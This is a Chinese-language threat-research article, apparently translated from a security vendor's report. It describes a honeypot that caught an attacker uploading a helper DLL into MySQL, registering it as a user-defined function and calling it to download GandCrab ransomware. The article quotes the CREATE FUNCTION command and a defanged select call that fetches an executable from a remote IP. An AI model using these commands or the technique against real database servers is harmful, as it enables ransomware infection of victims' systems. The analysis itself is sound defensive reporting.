研究人员在实验室环境中搭建了一个蜜罐系统，监听着 SQL 服务器使用的默认端口(TCP/3306 端口)。该蜜罐系统发现来自美国机器的攻击。研究人员监控了僵尸网络生成的网络流量和行为，发现该 Linux 蜜罐下载了一个 Windows 可执行文件。

攻击者首先用 SQL 数据库命令在上传 helper DLL 到服务器，然后作为数据库函数调用该 DLL 来提取 IP 地址位于加拿大魁北克省的主机上的 GandCrab payload。

数据库服务器下载 GandCrab

SQL 攻击

攻击的第一阶段是攻击者连接到数据库服务器，然后确定他运行的是 MySQL。因为蜜罐系统模拟了 MySQL，因此攻击的后面部分就非常顺利。

攻击者释放的 SQL 命令

然后，攻击者使用 set 命令来上传所有的字节，这些字节组成了 helper DLL，这些字节是长字符串格式的十六进制字符，在内存中会作为变量。

helper DLL 作为输出进入数据库，就像真的长记录一样

然后攻击者将变量的内容写入创建的数据库表 yongger2 中。

然后攻击者发布命令给服务器将这些字节拼接成一个文件，然后释放到服务器的插件目录中。研究人员还发现许多用于交换斜杠和反斜杠字符的命令，目的是绕过安全特征。

Helper DLL 的内部功能

DLL 看似会向数据库增加 3 个函数，分别是 xpdl3, xpdl3_deinit, xpdl3_init。DLL 只是许多恶意工具箱的一个组件，之前就被上传到 VirusTotal 这样的平台上。

helper DLL 包含在许多含有恶意工具集的文档中

攻击者会发布 SQL 命令来释放 yongger2 table，删除通过服务器的文件轨迹记录，释放函数 xpdl3。最后，使用下面的 SQL 命令来创建新的数据库函数 xpdl3 来调用该 DLL:

CREATE FUNCTION xpdl3 RETURNS STRING SONAME ’ cna12.dll ’

将 helper DLL 传到数据库服务器的插件目录并初始化后，攻击者就会发布 SQL 命令道服务器中，调用新添加的 xpdl3 函数：

select xpdl3 ( ’ hxxp://172.96.14.134:5471/3306-1 [ . ] exe ’ , ’ c:\isetup.exe ’ )

Wireshark 中发现的网络事件序列

如果一切正常，数据库服务器就会从远程机器下载 GandCrab payload，并释放到 C 盘根目录，命名为 isetup.exe 并执行。

这种攻击很流行

针对数据库服务器的攻击并不少见，而且这个趋势未来可能会继续。就在 5 月 19 日这个攻击就发生在真实的 MySQL 服务器上，机器应该已经被加密。

开放目录使用 HFS，含有中文用户接口

但是文件所在的 URL 指向的是位于 web 服务器的开放目录，web 服务器运行的是 HFS 服务器软件，这是一个基于 Windows 的 web 服务器。

但保存 GandCrab 样本的机器的 IP 地址的位置为美国的亚利桑那州，但机器安装的 HFS 用户接口是简体中文。而且显示有人多次下载了服务器上的文件。

开放目录显示有 5 个以 3306 开头的 Windows 可执行文件，之后是连字符 -，实际上是同一文件的多个重命名版本。只有 3306.exe 文件与其余的不同。目录中还含有名为 RDP 的恶意 Linux ELF 可执行文件，但是本次攻击活动中没有使用。

RDP 文件是相关的 DDOS Linux 木马的样本之一

服务器显示样本 3306-1.exe 的下载量超过 500 次。所有样本加起来 5 天下载了接近 800，开放目录中的 GandCrab 样本下载量超过 2300 次。

虽然目前还没有大规模攻击和广泛传播，但是确实对 MySQL 服务器管理员带来了巨大的威胁，因为 3306 端口会成为攻击者的一个跳板。